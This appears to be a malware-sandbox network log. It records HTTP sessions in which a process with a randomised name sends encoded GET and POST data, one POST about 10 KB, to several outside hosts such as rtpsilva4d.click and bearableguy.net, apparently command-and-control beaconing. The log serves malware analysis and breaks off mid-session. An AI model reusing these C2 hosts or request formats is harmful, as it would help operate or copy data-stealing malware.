                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                                Nov 17, 2024 08:37:17.703572989 CET218INData Raw: 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e
                                                                                Data Ascii: <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                20192.168.2.45002898.124.224.17803604C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 17, 2024 08:37:19.607604027 CET500OUTGET /9kvp/?Y8i=irFuJh4j2fCN/xdLIJkju+0Ww/aOPRv0cSVSUNzcrQBJ8yd3G+0Gay8rhpLSBKnoinj5jjn5ajFjqPJaFJwFxtDWOxi5ujV2lXqfQRwRqrJQ238DxciUY6U=&gvyXe=EtxTw6OpYVppMB HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.gcast.video
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Nov 17, 2024 08:37:20.466541052 CET1236INHTTP/1.1 404 Not Found
                                                                                Content-Type: text/html
                                                                                Server: Microsoft-IIS/10.0
                                                                                X-Powered-By: ASP.NET
                                                                                X-Frame-Options: SAMEORIGIN
                                                                                Date: Sun, 17 Nov 2024 07:37:19 GMT
                                                                                Connection: close
                                                                                Content-Length: 1245
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                                Nov 17, 2024 08:37:20.466597080 CET218INData Raw: 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e
                                                                                Data Ascii: <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                21192.168.2.45002967.223.117.169803604C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 17, 2024 08:37:25.531018972 CET772OUTPOST /e61w/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.rtpsilva4d.click
                                                                                Origin: http://www.rtpsilva4d.click
                                                                                Referer: http://www.rtpsilva4d.click/e61w/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 200
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 58 74 43 31 50 61 77 68 63 75 41 6b 73 4a 51 6a 4a 6b 58 2f 52 68 79 57 62 61 35 68 61 31 66 6b 7a 37 38 6c 54 4a 30 4d 77 57 72 65 36 2b 4d 4c 38 72 7a 4b 58 75 30 4d 72 78 4e 6a 31 73 76 62 47 77 30 74 59 46 4b 50 75 71 7a 4b 7a 4e 7a 53 68 4c 68 31 6a 47 70 6b 69 68 73 64 65 47 4b 79 46 79 6a 48 4a 41 30 72 72 31 50 77 74 68 36 45 56 78 65 75 50 79 64 45 59 6f 57 70 6b 58 66 68 49 59 78 32 2f 30 35 4e 74 65 50 37 62 79 5a 37 48 2f 70 61 7a 73 32 39 52 56 31 42 47 4c 61 45 74 69 48 35 75 56 62 34 33 73 6e 4d 2f 4e 4d 65 65 36 45 4b 73 48 50 2b 4e 57 34 30 65 76 67 70 32 51 3d 3d
                                                                                Data Ascii: Y8i=XtC1PawhcuAksJQjJkX/RhyWba5ha1fkz78lTJ0MwWre6+ML8rzKXu0MrxNj1svbGw0tYFKPuqzKzNzShLh1jGpkihsdeGKyFyjHJA0rr1Pwth6EVxeuPydEYoWpkXfhIYx2/05NteP7byZ7H/pazs29RV1BGLaEtiH5uVb43snM/NMee6EKsHP+NW40evgp2Q==
                                                                                Nov 17, 2024 08:37:26.203180075 CET479INHTTP/1.1 404 Not Found
                                                                                Date: Sun, 17 Nov 2024 07:37:26 GMT
                                                                                Server: Apache
                                                                                Content-Length: 315
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                22192.168.2.45003067.223.117.169803604C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 17, 2024 08:37:28.083425999 CET792OUTPOST /e61w/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.rtpsilva4d.click
                                                                                Origin: http://www.rtpsilva4d.click
                                                                                Referer: http://www.rtpsilva4d.click/e61w/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 220
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 58 74 43 31 50 61 77 68 63 75 41 6b 74 70 67 6a 46 6c 58 2f 55 42 79 58 46 71 35 68 52 56 66 67 7a 37 41 6c 54 4c 59 63 77 45 2f 65 35 63 55 4c 2f 76 48 4b 51 75 30 4d 67 52 4e 71 37 4d 75 58 47 77 6f 66 59 46 32 50 75 71 33 4b 7a 4a 33 53 68 59 5a 32 69 57 70 78 6b 68 73 62 51 6d 4b 79 46 79 6a 48 4a 42 51 56 72 31 58 77 74 77 4b 45 45 6c 71 74 54 69 64 46 49 34 57 70 67 58 66 74 49 59 78 75 2f 32 4e 6e 74 63 48 37 62 33 39 37 47 75 70 5a 71 38 33 32 50 6c 30 6a 4c 75 37 70 67 43 43 34 78 6b 79 44 38 65 33 68 33 72 64 45 50 4c 6c 64 2b 48 72 4e 51 52 78 41 54 73 64 67 74 63 2f 69 49 2b 6e 77 70 59 54 6f 4a 79 5a 61 6e 4c 61 41 46 5a 6f 3d
                                                                                Data Ascii: Y8i=XtC1PawhcuAktpgjFlX/UByXFq5hRVfgz7AlTLYcwE/e5cUL/vHKQu0MgRNq7MuXGwofYF2Puq3KzJ3ShYZ2iWpxkhsbQmKyFyjHJBQVr1XwtwKEElqtTidFI4WpgXftIYxu/2NntcH7b397GupZq832Pl0jLu7pgCC4xkyD8e3h3rdEPLld+HrNQRxATsdgtc/iI+nwpYToJyZanLaAFZo=
                                                                                Nov 17, 2024 08:37:28.751096964 CET479INHTTP/1.1 404 Not Found
                                                                                Date: Sun, 17 Nov 2024 07:37:28 GMT
                                                                                Server: Apache
                                                                                Content-Length: 315
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                23192.168.2.45003167.223.117.169803604C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 17, 2024 08:37:30.633543015 CET10874OUTPOST /e61w/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.rtpsilva4d.click
                                                                                Origin: http://www.rtpsilva4d.click
                                                                                Referer: http://www.rtpsilva4d.click/e61w/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 10300
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 58 74 43 31 50 61 77 68 63 75 41 6b 74 70 67 6a 46 6c 58 2f 55 42 79 58 46 71 35 68 52 56 66 67 7a 37 41 6c 54 4c 59 63 77 46 48 65 36 74 30 4c 38 49 62 4b 52 75 30 4d 70 78 4e 76 37 4d 75 65 47 77 67 62 59 46 37 36 75 6f 2f 4b 79 71 2f 53 77 35 5a 32 73 57 70 78 6d 68 73 65 65 47 4b 6e 46 32 2f 44 4a 41 67 56 72 31 58 77 74 7a 53 45 45 78 65 74 44 53 64 45 59 6f 57 31 6b 58 65 34 49 63 6c 51 2f 32 5a 64 74 6f 7a 37 59 58 4e 37 41 63 42 5a 31 73 33 30 4f 6c 30 46 4c 75 2f 71 67 43 65 4f 78 6b 33 4c 38 63 72 68 31 2f 41 77 54 66 73 48 71 56 50 63 53 47 49 6b 65 76 39 61 70 38 4c 45 50 74 2f 76 39 37 6e 66 4e 52 49 6f 36 4b 4f 4b 54 63 46 42 33 4d 5a 64 59 6f 4e 39 48 49 46 73 6b 5a 6e 51 44 6e 34 73 2b 71 61 51 34 4e 30 46 75 2b 35 49 62 2f 47 78 4b 68 41 70 72 38 2f 5a 6c 31 45 75 6d 32 41 6a 41 2f 56 43 6a 62 51 41 74 57 66 63 5a 31 64 73 57 4c 32 4e 59 52 76 30 2b 33 69 52 6b 70 44 49 32 59 56 57 57 78 2b 46 68 4a 52 63 73 77 74 34 49 31 78 73 56 73 49 47 68 33 69 72 45 33 45 34 63 66 [TRUNCATED]
                                                                                Data Ascii: Y8i=XtC1PawhcuAktpgjFlX/UByXFq5hRVfgz7AlTLYcwFHe6t0L8IbKRu0MpxNv7MueGwgbYF76uo/Kyq/Sw5Z2sWpxmhseeGKnF2/DJAgVr1XwtzSEExetDSdEYoW1kXe4IclQ/2Zdtoz7YXN7AcBZ1s30Ol0FLu/qgCeOxk3L8crh1/AwTfsHqVPcSGIkev9ap8LEPt/v97nfNRIo6KOKTcFB3MZdYoN9HIFskZnQDn4s+qaQ4N0Fu+5Ib/GxKhApr8/Zl1Eum2AjA/VCjbQAtWfcZ1dsWL2NYRv0+3iRkpDI2YVWWx+FhJRcswt4I1xsVsIGh3irE3E4cfS5tp+MNTQeTE8Tx8Jm0yhiLGPqIfF+SLwk2DKoUKmhZ1MB7qy9I03ROghcEfMjTyPtI5Gy7nA26Wti9V4rV2/AthcW8acKAlR98Z0T/iwkZKjihCCDVPYCz3OUA6Zfvqr2Ii6Or+7TBpoRbMGbhwQx6xLbCSNq1RsCzxNV/fZJDwR3klPyLLveztKN34u6ReiAT1vlGPPDo98Fd7jmPLUuXYYQL5JsxsA+HaPMRIlLcpYCoRzEOzwjUrW2jdE80hfw2Xe9+/73RvX7lzFQEr4Q+McHb0oulDZEhm/SzUsv1nRM4Sz6xVFHTtShsn1cMzGT2U482NVbNwe6NcZrxaaz7Be03YdEWO6Qg/PyQqHrRMtnJrfnilBYhJD6rXWRcZh+tWKnBjoSguiCBOx+fT6PloHqdC2IfYWkkv4dsZUv/qfTHOLdVdiQ2WhTylmM4M5NhAVUzJrt9/JY4u2z80CZ+fpTmh5gXbP7TC6/zyZHgo4yf9nJidfUp90C5E3yo7zmt2XD/AevjxgEJWUqcdGzfOXUxHEO4j2IeC3GohbnDaZkJGHZMkAH1XcvsG2EDdXtiLGt7xMZQ+teiOC7Pnfulnp3LMu1/OfjER3XMuct/mUdHbBpX1gu3B88hxIV+p9ngh6sjdchay9SQtsdGb9CkZSZtbhz0FcH [TRUNCATED]
                                                                                Nov 17, 2024 08:37:31.302999973 CET479INHTTP/1.1 404 Not Found
                                                                                Date: Sun, 17 Nov 2024 07:37:31 GMT
                                                                                Server: Apache
                                                                                Content-Length: 315
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                24192.168.2.45003267.223.117.169803604C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 17, 2024 08:37:33.173196077 CET505OUTGET /e61w/?Y8i=avqVMth+cNQRkZY2K2P4TQnPCfJBRHrYtZ8WRp4GnmfHlpA3lZroTpAoo3xn6sOeWVk5VUrnhZ7C94/2/OFxplk4lAdpGXqEZWiDVUw5kH/U8gSaCEqLMGU=&gvyXe=EtxTw6OpYVppMB HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.rtpsilva4d.click
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Nov 17, 2024 08:37:33.829375982 CET479INHTTP/1.1 404 Not Found
                                                                                Date: Sun, 17 Nov 2024 07:37:33 GMT
                                                                                Server: Apache
                                                                                Content-Length: 315
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                25192.168.2.4500333.33.130.190803604C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 17, 2024 08:37:38.937521935 CET769OUTPOST /37uf/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.bearableguy.net
                                                                                Origin: http://www.bearableguy.net
                                                                                Referer: http://www.bearableguy.net/37uf/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 200
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 55 6f 61 78 6b 44 34 50 4b 6e 63 59 52 6a 53 6f 50 2b 30 53 31 57 75 53 46 79 59 49 39 59 63 70 63 6f 64 68 46 51 59 7a 70 78 6b 4b 33 39 31 33 58 53 42 59 50 35 4c 7a 69 7a 4a 30 64 43 39 58 6c 68 68 52 77 79 49 53 67 2f 2f 5a 4c 53 63 36 79 75 50 4e 35 48 44 4b 38 33 67 4e 6e 5a 30 2b 6b 66 2b 77 52 45 37 67 73 4f 42 53 34 35 38 6c 34 6b 50 2f 6a 75 52 70 73 6f 37 68 43 38 68 62 4b 2f 2f 4d 4f 46 53 4c 62 76 64 5a 78 5a 76 75 74 54 35 6e 53 73 73 48 51 6f 2f 6b 78 4e 54 5a 41 6b 55 4b 57 4d 74 5a 4b 6e 6c 42 53 65 32 38 39 41 4d 52 52 55 56 6c 46 45 2b 30 39 76 49 4f 79 51 3d 3d
                                                                                Data Ascii: Y8i=UoaxkD4PKncYRjSoP+0S1WuSFyYI9YcpcodhFQYzpxkK3913XSBYP5LzizJ0dC9XlhhRwyISg//ZLSc6yuPN5HDK83gNnZ0+kf+wRE7gsOBS458l4kP/juRpso7hC8hbK//MOFSLbvdZxZvutT5nSssHQo/kxNTZAkUKWMtZKnlBSe289AMRRUVlFE+09vIOyQ==


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                26192.168.2.4500343.33.130.190803604C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 17, 2024 08:37:41.473596096 CET789OUTPOST /37uf/ HTTP/1.1
